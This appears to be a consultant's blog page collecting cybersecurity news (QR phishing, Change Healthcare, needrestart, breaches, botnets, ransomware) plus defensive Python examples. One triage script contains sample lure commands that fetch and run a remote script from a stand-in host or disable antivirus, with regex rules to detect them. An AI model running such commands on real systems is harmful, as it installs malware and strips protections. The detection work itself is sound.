Steve Thomas - IT Consultant


  • New research claims most QR code emails are spam
  • QR codes can easily bypass anti-spam filters, Cisco Talos warns
  • 'Quishing' attacks are becoming more common

The dangers of clicking an unknown or suspicious link should have been drilled into most of us by now, but many don’t realize scanning a malicious QR code from an unknown source could be just as damaging.

Despite QR codes steadily gaining popularity over the last few years, research from Cisco Talos has claimed many people still don’t consider the threats they could pose.

A driving factor is that anti-spam filters aren't designed to recognize that a QR code is present in an image, so such messages overwhelmingly evade detection. Talos says that although only about 1 in every 500 emails contains a QR code, roughly 60% of those are spam.

'Quishing' threats

QR code phishing, or 'quishing', is becoming an increasingly common threat; the codes often lead to imitations of real sites that trick victims into entering personal and payment information. Fraudsters have been observed placing QR stickers on parking meters, for example, to lure victims into entering their payment details into fake parking apps.

Talos particularly warned about malicious QR code emails carrying fake multi-factor authentication requests, used to steal user credentials.

QR codes in emails make up only a fraction of email worldwide (between 0.1% and 0.2%), but Talos found these messages disproportionately bypass anti-spam filters, so users see them in their inboxes far more often than the raw numbers suggest.

Malicious URLs can be 'defanged' by changing the protocol from 'http' to 'hxxp', or by adding brackets around one of the dots in the URL; browsers and mail clients then don't render the string as an active link, so users can't inadvertently follow it. Defanging is less common with QR codes.

It can be done, though, either by obscuring some of the data modules or by removing one or more of the position detection patterns (the large squares in three corners of the QR code), so that a scanner no longer recognizes the code. This makes the QR code safe to share in reports and threat intelligence.

Users should exercise just as much caution with QR codes as they do with suspicious links, Talos suggests. For those who need to handle QR codes regularly, QR decoders are available online that accept a screenshot of the code and let you inspect the embedded link closely before visiting it.
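The defanging and inspection steps above, as an added example that is not Cisco Talos' code: URL defang/refang as described, the QR equivalent of blanking a finder pattern, and a helper that pulls image parts out of an .eml so they can be fed to a QR decoder offline. The sample e-mail, the 21x21 matrix and the "looks like a QR lure" heuristic are all constructed for this example and are assumptions of mine, not findings from the report.

```python
# Added example (not Cisco Talos' code): defang/refang URLs the way the
# article describes, blank a QR finder pattern so a phone will not scan
# the code, and pull image parts out of an .eml so they can be fed to a
# QR decoder offline. The sample e-mail below is constructed for this
# example; nothing here is from the Talos research.
import email
import re
from email import policy


def defang_url(url: str) -> str:
    """http(s):// -> hxxp(s):// and every '.' -> '[.]', so mail clients
    and chat tools no longer render the string as a clickable link."""
    url = re.sub(r"(?i)^http(s?)://", r"hxxp\1://", url)
    return url.replace(".", "[.]")


def refang_url(url: str) -> str:
    """Reverse defang_url() when an analyst wants the live URL back."""
    url = re.sub(r"(?i)^hxxp(s?)://", r"http\1://", url)
    return url.replace("[.]", ".")


# The 7x7 position-detection (finder) pattern that sits in three corners
# of every QR code; '#' is a dark module, '.' a light one.
FINDER = [
    "#######",
    "#.....#",
    "#.###.#",
    "#.###.#",
    "#.###.#",
    "#.....#",
    "#######",
]


def sample_qr():
    """Constructed 21x21 (version 1 sized) matrix: three finder patterns
    plus filler in place of real data modules. Not a decodable QR code."""
    size = 21
    m = [["#" if (r * 7 + c * 3) % 5 == 0 else "." for c in range(size)]
         for r in range(size)]
    for r0, c0 in ((0, 0), (0, 14), (14, 0)):
        for i in range(7):
            for j in range(7):
                m[r0 + i][c0 + j] = FINDER[i][j]
    return ["".join(row) for row in m]


def has_finder_pattern(matrix, row, col) -> bool:
    """True if a full finder pattern starts at (row, col)."""
    return all(matrix[row + i][col:col + 7] == FINDER[i] for i in range(7))


def defang_qr(matrix):
    """Blank the top-left finder pattern (the page's second QR defanging
    method). Most scanners need all three to lock on, so the code stops
    scanning while the data modules stay visible for analysis."""
    out = list(matrix)
    for i in range(7):
        out[i] = "." * 7 + out[i][7:]
    return out


# Constructed phishing-style e-mail: short text plus an image attachment
# (only the 8-byte PNG signature, base64-encoded, stands in for the image).
SAMPLE_EML = b"""From: payroll@example.test
To: you@example.test
Subject: Action required: confirm your MFA
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset=utf-8

Scan the attached code to approve the sign-in request.
--b1
Content-Type: image/png; name="mfa.png"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="mfa.png"

iVBORw0KGgo=
--b1--
"""


def image_parts(raw: bytes):
    """(filename, bytes) for every image part, inline or attached, so each
    can be screenshotted or decoded with a QR tool before anyone scans it."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    return [(p.get_filename() or "inline", p.get_payload(decode=True))
            for p in msg.walk() if p.get_content_maintype() == "image"]


def looks_like_qr_lure(raw: bytes) -> bool:
    """Heuristic (my own, not Talos'): an image part plus text urging the
    reader to scan something deserves a manual look."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    body = msg.get_body(preferencelist=("plain",))
    text = body.get_content() if body else ""
    return bool(image_parts(raw)) and re.search(r"\bscan\b|\bQR\b", text, re.I) is not None
```

Run `image_parts()` on a suspicious message, decode the returned image with a QR tool, then pass the result through `defang_url()` before pasting it into a ticket; `refang_url()` restores the live link for a sandbox visit.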

You might also like


  • Change Healthcare's clearinghouse services have been restored
  • The organization suffered a huge ransomware attack in February
  • Attack has cost it over $2 billion so far

Change Healthcare has confirmed its clearinghouse services have finally been restored after the organization suffered a massive ransomware attack in February 2024.

Recovery from the Change Healthcare cyberattack has been grueling, costing more than $2 billion so far, with some systems still not restored nearly nine months on.

Although most of its network was restored after two months, some functions are still not fully restored, including its pharmacy claims management and e-health record information exchange systems.

100 million affected

Change Healthcare and parent company UnitedHealth Group's activities touch 1 in 3 patient records in the US, processing 15 billion health care transactions annually.

The attack caused unprecedented levels of disruption to billing and payments providers across the US, and threatened the viability of hospitals across the country.

It was recently revealed that as many as 100 million people’s information was exposed in the attack, with 6TB of sensitive data stolen, including health insurance info, billings, claims, payment information, and much more.

UnitedHealth reportedly paid $22 million to the notorious ALPHV group for the stolen data, but remediation alone has cost $873 million, and the costs keep rising.

Reports claim the ransom never reached the affiliate responsible for the intrusion: the ALPHV operators, who were only meant to receive a portion, kept it in its entirety.

The attackers reportedly used stolen credentials to log into a Citrix remote-access portal that did not have multi-factor authentication enabled, which left the organization exposed.

It's likely the repercussions of the attack will be felt long into the future, with some systems yet to be restored. In an American Hospital Association survey conducted in early March 2024, about 60% of responding hospitals reported a revenue shortfall of $1 million or more per day, and a third said more than half of their revenue was affected.

Via The Register

  • Security researchers find multiple flaws in service introduced a decade ago
  • The flaws allow malicious actors to escalate privileges and run arbitrary code
  • A patch is available, and users are urged to apply it

Ubuntu Linux has shipped with a utility carrying multiple high-severity vulnerabilities for a decade, allowing local attackers to escalate their privileges to root without user interaction, experts have warned.

Cybersecurity researchers at Qualys found the bugs in 'needrestart', a utility that checks which services need to be restarted after an update or a change in the system's libraries or binaries.

It is particularly useful after applying security updates or upgrading packages, as it ensures that the updates are effectively applied without requiring a full system reboot.

Exploitable vulnerabilities

Needrestart is capable of identifying services using outdated libraries, prompting to restart them, and recommending a system reboot when necessary. As a result, it helps maintain the security and stability of a system without needing frequent reboots.

Needrestart was introduced in 2014 and is maintained as a Debian package; Ubuntu Server has installed it by default since 21.04. The flaws have been present since version 0.8, the first release. The five vulnerabilities are tracked as CVE-2024-48990, CVE-2024-48991, CVE-2024-48992, CVE-2024-10224, and CVE-2024-11003. The earliest vulnerable version is 0.8, and the earliest fixed version is 3.8, released earlier this week.

More details about the vulnerabilities can be found in Qualys' advisory, but in short, they allow attackers to execute arbitrary code as root on vulnerable systems. The only prerequisite is local access, whether through malware or a compromised account.

While the local-access requirement sounds like a solid mitigation, BleepingComputer notes that attackers have exploited similar Linux privilege escalation flaws in the past.

Notable examples are Looney Tunables (CVE-2023-4911, in glibc's dynamic loader) and the kernel's nf_tables bug (CVE-2024-1086). Needrestart is extremely widely deployed, and attackers will most likely try to exploit it, so users should upgrade to version 3.8 or later, or apply their distribution's patched package, as soon as possible.
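A quick check for the version range and mitigation described above, as an added example (mine, not Qualys' or needrestart's code). It reads the Debian package version from dpkg, classifies the upstream release against the 0.8 to 3.8 range the article gives, and looks for the interpreter-scanning kill switch in needrestart.conf. One caveat is an assumption I add here rather than something the article states: distributions backport fixes without bumping the upstream version number, so a "vulnerable" verdict from this script must be confirmed against your distro's security advisory.

```python
# Added example, not Qualys' or needrestart's own code: classify a
# needrestart Debian package version against the range the article gives
# (0.8 up to, but excluding, 3.8) and check for the interpreter-scanning
# kill switch. Caveat (an assumption stated here, not from the article):
# distributions backport fixes without bumping the upstream number, so a
# "vulnerable" result must be confirmed against your distro's advisory.
import re
import shutil
import subprocess

FIRST_VULNERABLE = (0, 8)
FIRST_FIXED = (3, 8)


def upstream_version(debian_version: str) -> tuple:
    """'1:3.6-7ubuntu4' -> (3, 6): strip epoch and Debian revision."""
    upstream = debian_version.split(":", 1)[-1].split("-", 1)[0]
    nums = [int(n) for n in re.findall(r"\d+", upstream)[:2]]
    while len(nums) < 2:
        nums.append(0)
    return tuple(nums)


def is_vulnerable_upstream(debian_version: str) -> bool:
    """True if the upstream release falls inside the vulnerable range."""
    return FIRST_VULNERABLE <= upstream_version(debian_version) < FIRST_FIXED


# needrestart.conf line that disables interpreter scanning, the mitigation
# Qualys suggested for hosts that cannot update immediately.
INTERPSCAN_OFF = re.compile(r"^\s*\$nrconf\{interpscan\}\s*=\s*0\s*;", re.M)


def interpscan_disabled(conf_text: str) -> bool:
    """True if an uncommented '$nrconf{interpscan} = 0;' is present."""
    live = "\n".join(line for line in conf_text.splitlines()
                     if not line.lstrip().startswith("#"))
    return INTERPSCAN_OFF.search(live) is not None


def installed_version():
    """Installed needrestart version from dpkg, or None if not found."""
    if shutil.which("dpkg-query") is None:
        return None
    proc = subprocess.run(["dpkg-query", "-W", "-f=${Version}", "needrestart"],
                          capture_output=True, text=True)
    return proc.stdout.strip() or None


def assess(debian_version: str, conf_text: str) -> str:
    """Combine both checks into one verdict string."""
    if not is_vulnerable_upstream(debian_version):
        return "not in vulnerable upstream range"
    if interpscan_disabled(conf_text):
        return "vulnerable version, interpreter scanning disabled (mitigated)"
    return "vulnerable version, interpreter scanning enabled: update or mitigate"


if __name__ == "__main__":
    ver = installed_version()
    if ver is None:
        print("needrestart not installed or dpkg-query unavailable")
    else:
        try:
            with open("/etc/needrestart/needrestart.conf") as fh:
                conf = fh.read()
        except OSError:
            conf = ""
        print(f"needrestart {ver}: {assess(ver, conf)}")
```

Run it as root on a Debian or Ubuntu host; the `assess()` string tells you whether to update, whether the `$nrconf{interpscan} = 0;` mitigation is already in place, or whether the installed release is outside the range altogether.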

Via BleepingComputer

  • A threat actor is offering a large database for sale, claims it came from Finastra
  • The finance giant sends out data breach notification letter to affected customers, claiming its secure file transfer service was compromised
  • The attacker used stolen credentials to pull off the heist

Fintech software firm Finastra is warning customers that a recent security incident resulted in the theft of some of its data.

Security journalist Brian Krebs obtained a copy of the letter sent to affected individuals, which says the breach was not the result of an exploited vulnerability, but of stolen credentials.

“The threat actor did not deploy malware or tamper with any customer files within the environment,” the notice reads. “Furthermore, no files other than the exfiltrated files were viewed or accessed.”

400GB - zipped

The company told BleepingComputer the attack originated on its Secure File Transfer Platform (which Finastra abbreviates to SFTP): "On November 7, 2024 Finastra's Security Operations Center (SOC) detected suspicious activity related to an internally hosted Secure File Transfer Platform (SFTP) we use to send files to certain customers," Finastra told the publication.

"We immediately launched an investigation alongside of a third-party cybersecurity firm and, as a precautionary step, isolated and contained the platform. This incident was limited to the one platform and there was no lateral movement beyond it."

Finastra also told the publication the platform was not its default file transfer platform and was not used by all customers, suggesting that not every customer's data was compromised.

Around the same time, a threat actor using the alias 'abyss0' offered for sale a large archive they claimed originated from Finastra.

“Today we list for sale Finastra.com data breach, dated 2024 Nov,” the notice reads. “In total, 400GB~ zipped.”

“This data is from their ESB and exfil via IBM Aspera, not everything just stuff we deemed as important. There is a lot of files and different file format.”

Finastra is a financial software company with more than 8,000 institutions as customers, including most of the world's top banks and credit unions, and more than 7,000 employees.

Via BleepingComputer

  • A hacker advertised access to a number of French healthcare organizations
  • A few hours later, they tried selling sensitive data grabbed from some of them
  • More than 750,000 people were apparently exposed

A cyberattack against French healthcare establishments has resulted in the theft of sensitive data on more than 750,000 patients.

A threat actor using the alias near2tlg took to the infamous hacking forum BreachForums to offer access to "multiple establishments", including Centre Luxembourg, Clinique Alleray-Labrouste, and several others.

They claimed that the offering granted access to sensitive data belonging to 1.5 million people, including patient records, billing, and other data.

Compromised account

Two hours later, the same actor posted a new thread selling "French hospital data". The compromised information allegedly included people's names, dates of birth, gender, postal addresses, cities, postal codes, phone numbers, and email addresses. The archive also reportedly contained information on attending physicians, prescriptions, death declarations, and more. They said 758,912 patients were affected, and that the breach was carried out through Mediboard.

Mediboard is an Electronic Patient Record (EPR) solution developed by Softway Medical Group. The company confirmed the breach to local media, but stressed that the attack was not the result of a vulnerability in its software, but of stolen credentials.

"We want to emphasize that the affected health data were not hosted by Softway Medical Group," they said.

In a statement to BleepingComputer, the company said that the compromised account had elevated privileges: "We can confirm that our software is not responsible, but rather, a privileged account within the client's infrastructure was compromised by an individual who exploited the standard functions of the solution.”

"This hypothesis has been substantiated. It is therefore neither due to improper implementation of the software nor human error."

At press time, there were no confirmed buyers, but healthcare data is highly prized among cybercriminals, who can use it for a wide variety of crime, from phishing to identity theft, wire fraud, and more.

  • Microsoft announces Zero Day Quest, a new hacking event for security researchers
  • An in-person event will also take place
  • Bug bounties for AI-related issues have also been doubled

Microsoft has announced an open-to-all research challenge encouraging researchers to discover high-impact vulnerabilities in its products.

Zero Day Quest will offer bug bounties for researchers who report flaws in Microsoft AI, Azure, Identity, Dynamics 365 and Power platform, and M365.

The challenge will run until January 19, 2025, and will be subject to existing bounty program terms, the safe harbor policy, and additional terms and conditions.

AI bugs worth double

Microsoft hopes the event will bring together the security community and encourage collaboration between researchers and engineers to help keep all its users safe.

Alongside the online event, the top 45 researchers (ranked by bounty amount awarded) will be invited to an all-expenses-paid onsite Zero Day Quest event in Redmond, Washington, along with the 10 highest-ranked researchers from the 2024 Azure, Dynamics, and Office leaderboards.

AI has dominated the security conversation for the last year, and to reflect growing concern about AI security, Microsoft has doubled the AI bounty awards. Other bounty multipliers have also been introduced, such as for critical- and important-severity Remote Code Execution and Elevation of Privilege flaws.

Microsoft says it has made security its number one priority through its Secure Future Initiative, which puts 'security above all else' to protect users and businesses.

“This new hacking event will be the largest of its kind, with an additional $4 million in potential awards for research into high-impact areas, specifically cloud and AI,” said Tom Gallagher, VP of Engineering for Microsoft Security Response Center.

“Zero Day Quest will provide new opportunities for the security community to work hand in hand with Microsoft engineers and security researchers – bringing together the best minds in security to share, learn, and build community as we work to keep everyone safe.”

  • Security researchers from Lumen's Black Lotus Labs investigated the ngioweb botnet for more than a year
  • After identifying the infrastructure and traffic, the company started blocking the data flow
  • The botnet, and the proxy service NSOCKS, are severely disrupted as a result

Security researchers have disrupted a major malicious botnet, and thus also hurt the proxy service it powered.

Cybersecurity researchers from Lumen's Black Lotus Labs have released a new report saying they blocked all traffic across their global network going to or from the dedicated infrastructure associated with the 'ngioweb' botnet.

The ngioweb botnet, first documented in 2018 and tracked by Black Lotus Labs for more than a year, operated more than 35,000 bots (compromised devices) every day. The bots were located in 180 countries and were used, first and foremost, to power the NSOCKS proxy service. This "notorious criminal proxy service", as Black Lotus Labs describes it, is linked to the threat actor known as Muddled Libra, and there are also indications that the proxy was used by state-sponsored actors such as APT28 (aka Fancy Bear, a known Russian threat actor).

Disrupting the operation

“At least 80% of NSOCKS bots in our telemetry originate from the ngioweb botnet, mainly utilizing small office/home office (SOHO) routers and IoT devices. Two-thirds of these proxies are based in the U.S.,” the researchers said.

A proxy service lets threat actors run malicious campaigns while hiding their true identity and location by routing traffic through a "proxy", a middleman device.

Besides operating as a proxy, the ngioweb botnet could also be used to mount disruptive Distributed Denial of Service (DDoS) attacks.

Lumen spent more than a year analyzing the botnet and its operations, and while it could not determine exactly how the devices were compromised, it believes various n-day vulnerabilities were the most likely route.

At press time, the NSOCKS proxy and the underlying ngioweb botnet were being heavily disrupted by Lumen and its partners, who have mapped both the botnet's architecture and its traffic.

Via BleepingComputer

  • Researchers spot Helldown exploiting Zyxel VPN to breach networks
  • The flaw was previously undisclosed
  • The crooks mostly target SMBs in the US and Europe

There appears to be a new ransomware player in town, exploiting vulnerabilities in Zyxel firewalls, including their IPSec VPN component, to compromise victims, steal their data, and encrypt their systems.

The group, called Helldown, has been active since summer 2023, a new report from cybersecurity researchers at Sekoia has revealed, noting that it most likely uses a previously undisclosed vulnerability in Zyxel's firewalls for initial access.

The group also appears to be exploiting CVE-2024-42057, a command injection bug in the IPSec VPN feature of Zyxel's firewall firmware that, in certain configurations, lets unauthenticated attackers run OS commands.

Dozens of victims

When they breach a target network, they steal as many files as they can and encrypt the systems. For encryption, they appear to be using a piece of software built from the leaked LockBit 3 builder. The researchers said the encryptor was relatively basic, and probably still under development.

As basic as it is, the encryptor has still locked down at least 31 organizations, as that's the number of victims listed on the group's data leak site. According to BleepingComputer, between November 7 and today the number dropped to 28, which could hint that some organizations paid the ransom. We don't know who the victims are, or how much the crooks demanded for the decryption key and for not leaking the data.

Most of the victims seem to be small and medium-sized organizations in the United States and Europe.

If the researchers are right that Helldown breaches networks through flaws in Zyxel firewalls and their IPSec VPN, the best defense is to keep these devices up to date and limit VPN access to trusted accounts only. Zyxel fixed CVE-2024-42057 on September 3, and the earliest clean firmware version is ZLD 5.39. Since the other vulnerability is still undisclosed, it would be wise to watch for upcoming Zyxel advisories and deploy the patch as soon as it's published.

Via BleepingComputer

  • Oracle reports patching a security flaw in Agile PLM
  • The bug was being exploited in the wild to steal files
  • More than 1,000 companies could be vulnerable

Oracle has fixed a vulnerability in its Oracle Agile Product Lifecycle Management (PLM) product which could have allowed threat actors to download files from the platform.

Since the bug was exploited in the wild as a zero-day, the company urged users to apply the patch immediately to secure their deployments.

Oracle Agile Product Lifecycle Management (PLM) is the company's software tool to help businesses manage the entire lifecycle of a product, from ideation and design to production and retirement.

Confirmed exploitation

More than 1,100 companies reportedly use Oracle Agile Product Lifecycle Management (PLM), predominantly large enterprises with more than 10,000 employees and revenues exceeding $1 billion. The total number of individual users across these organizations is not publicly disclosed and can vary significantly based on each company's size and specific deployment of the software.

The patch fixes a bug tracked as CVE-2024-21287, with a CVSS severity score of 7.5 (high). It is remotely exploitable without authentication, Oracle explained in an advisory, adding that "it may be exploited over a network without the need for a username and password. If successfully exploited, this vulnerability may result in file disclosure."

"Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible."

In the advisory, the company did not state the bug was being exploited in the wild, but a later blog post by Eric Maurice, the company's VP of Security Assurance, confirmed it, BleepingComputer found.

"This vulnerability affects Oracle Agile Product Lifecycle Management (PLM). It was reported as being actively exploited 'in the wild' by CrowdStrike," Maurice said.

At press time, other details were not available, so we don’t know who the threat actors are, or who they are targeting in their campaign. In any case, it’s better to be safe than sorry, so make sure to apply the patch ASAP.

  • Gen Q3 Threat Report reveals 'Scam Yourself' attacks saw a huge rise
  • 614% increase in social engineering scams
  • Ransomware and crypto scams are also claiming more victims

The last few months have seen a worrying escalation in ransomware, malvertising, infostealers, and crypto scams, new research has claimed.

The Gen Q3 Threat Report has revealed a major rise in 'Scam Yourself' attacks, a social engineering tactic that tricks users into compromising their own systems, which saw a staggering 614% rise quarter over quarter.

The 'scam yourself' term covers a number of threats, including FakeCaptcha, fake tutorials, and ClickFix scams. FakeCaptcha pages exploit users' familiarity with CAPTCHA prompts, using ClickFix-style instructions to trick unsuspecting victims into running malicious scripts and downloading malware.

How to: download malware

YouTube tutorials are being used by cybercriminals to get users to download malware under the guise of installing software. Antivirus software should detect this even when the user is the one who clicks, copies, and executes the threat.

However, as part of the tutorial, many users are prompted to turn off their antivirus controls - which is what makes this attack so alarming.
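The "run this yourself" step that these lures end with leaves a trace on the victim's machine: the pasted command sits in Windows' Run-dialog history (the RunMRU registry key). Below is an added example of triaging such entries, written by me for this page and not taken from Gen's report or any vendor ruleset. The RunMRU values are constructed, and the regexes are my own starting-point heuristics for the two behaviours the text describes: fetching and executing a remote script, and switching off antivirus.

```python
# Added example (mine, not Gen's): heuristic triage of Windows Run-dialog
# history for the "scam yourself" lures the report describes, which end
# with the victim pasting a command that fetches and runs a script, or
# that switches off antivirus. The RunMRU entries are constructed for this
# example and the patterns are my own starting point, not a vendor ruleset.
import re

RULES = [
    ("remote-script-exec",
     re.compile(r"\b(iwr|invoke-webrequest|curl|wget)\b.*\|\s*(iex|invoke-expression|sh|bash)\b", re.I)),
    ("mshta-remote", re.compile(r"\bmshta(\.exe)?\s+(https?:)?//", re.I)),
    ("hidden-window", re.compile(r"-(w|windowstyle)\s+hidden", re.I)),
    ("encoded-command", re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("bypass-policy", re.compile(r"-(ep|executionpolicy)\s+bypass", re.I)),
    ("av-disable", re.compile(r"set-mppreference\b.*-disablerealtimemonitoring\s+\$?true", re.I)),
]


def run_mru_command(value: str) -> str:
    """RunMRU values end in a literal '\\1'; strip it to get the typed command."""
    return value[:-2] if value.endswith("\\1") else value


def classify(command: str):
    """Sorted list of rule names that match the command (empty if benign)."""
    return sorted(name for name, rx in RULES if rx.search(command))


def triage(values):
    """(command, hits) for every RunMRU entry that trips at least one rule."""
    results = []
    for value in values:
        cmd = run_mru_command(value)
        hits = classify(cmd)
        if hits:
            results.append((cmd, hits))
    return results


# Constructed RunMRU-style entries: two ClickFix/FakeCaptcha-style lures,
# one "turn off your antivirus" tutorial step, and one benign entry.
SAMPLE_RUNMRU = [
    'powershell -w hidden -ep bypass -c "iwr https://lure.example/verify.txt | iex"\\1',
    "mshta https://lure.example/captcha.hta\\1",
    "powershell Set-MpPreference -DisableRealtimeMonitoring $true\\1",
    "notepad.exe\\1",
]

if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_RUNMRU):
        print(f"{', '.join(hits):40s} {cmd}")
```

On a real host, feed `triage()` the string values under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` (exported from a forensic image or read via the registry API); the same rules apply equally well to process command lines from EDR telemetry, where the `\1` suffix is simply absent.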

Alongside these threats, the report notes a 24% increase in ransomware attacks from the previous quarter, echoing reports from earlier this year that such incidents are soaring to new highs around the world.

The rise of Lumma stealer, a Malware-as-a-Service offering, has fueled a 39% rise quarter over quarter in infostealer activity. These attacks are gaining prominence thanks to their ability to bypass protections, the report states.

Crypto scams also spiked thanks to evolving deepfake technology that exploits media events, a trend seen rising in recent months. Increasingly convincing fake videos can attract huge audiences, leverage the likenesses of well-known figures and celebrities, and encourage viewers to invest in fake crypto schemes.

  • Security researchers find a critical remote code execution flaw in multiple D-Link router models
  • The models reached end of life status last spring, meaning the flaw won't be patched
  • D-Link urges users to replace the devices with newer models immediately

A critical vulnerability, allowing for remote code execution (RCE) attacks, has been discovered on multiple D-Link VPN routers.

However, since the models have now reached end-of-life, D-Link will not be issuing a patch - and instead, it urged users to retire the affected devices and replace them with newer, supported models.

The flaw does not yet have a CVE designation, and neither the company nor the researcher who found it, who goes by the alias 'delsploit', will release details for now, to give affected customers time to react. Once word gets out, cybercriminals will start scanning for vulnerable routers, so if you use one of these models, replace it as soon as possible:

DSR-150
DSR-150N
DSR-250
DSR-250N

No workarounds

D-Link said that both hardware and firmware support for these devices has ended, and that it does not recommend workarounds:

"The DSR-150 / DSR-150N / DSR-250 / DSR-250N all hardware versions and firmware versions have been EOL/EOS as of 05/01/2024. This exploit affects this legacy D-Link router and all hardware revisions, which have reached their End of Life [...]. Products that have reached their EOL/EOS no longer receive device software updates and security patches and are no longer supported by D-Link US,” D-Link said in a recent security advisory.

"D-Link strongly recommends that this product be retired.”

Routers, as the gateways for all internet traffic on a local network, are usually the first thing criminals try to compromise. End-of-life devices with known critical vulnerabilities, especially RCE, are considered low-hanging fruit.

Furthermore, the affected models are often used in homes and small businesses, according to a recent BleepingComputer report, making them an ideal target for malware deployment, distributed denial of service botnets, and possibly even ransomware attacks.

Via BleepingComputer

  • Researchers spot Chinese threat actor stealing login credentials from Fortinet VPN
  • Thefts carried out with the help of a vulnerability reported to Fortinet in July 2024
  • The bug is yet to be addressed, or even assigned a CVE

Cybersecurity researchers have revealed that for months now, Fortinet's Windows VPN client has carried a flaw that allows threat actors to steal user credentials, and Chinese hackers have reportedly been exploiting it to do exactly that.

Experts from Volexity have published an in-depth report on a piece of malware called DeepData, used by a Chinese threat actor known as BrazenBamboo to steal login credentials and VPN server information from Fortinet's FortiClient VPN.

As the experts explain, after a user logs into the VPN, the credentials remain in the client's process memory. DeepData locates and decrypts JSON objects in that memory, extracting the credentials, and then exfiltrates them to a server under the attackers' control.

BrazenBamboo

Volexity found the vulnerability in early July 2024 and reported it to Fortinet. The company acknowledged the issue on July 24, but at the time of writing it remains unresolved: no CVE has been assigned, and there is no indication when a fix might be available, if ever.

The findings are disturbing since Fortinet’s VPNs are used by many organizations of all sizes, all across the world. By obtaining login credentials, cybercriminals can gain access to company networks, which allows them to move laterally, steal more information, and potentially even deploy ransomware.

Until a patch is available, Volexity advises restricting VPN access and watching closely for unusual login activity.

BrazenBamboo appears to be a state-sponsored threat actor working for China. The researchers believe the group developed three known malware families: LightSpy, DeepData, and DeepPost. Unlike North Korean groups, which don't shy away from deploying ransomware or other destructive malware, Chinese groups are mostly interested in cyber-espionage and usually try to remain hidden for as long as possible.

Via BleepingComputer
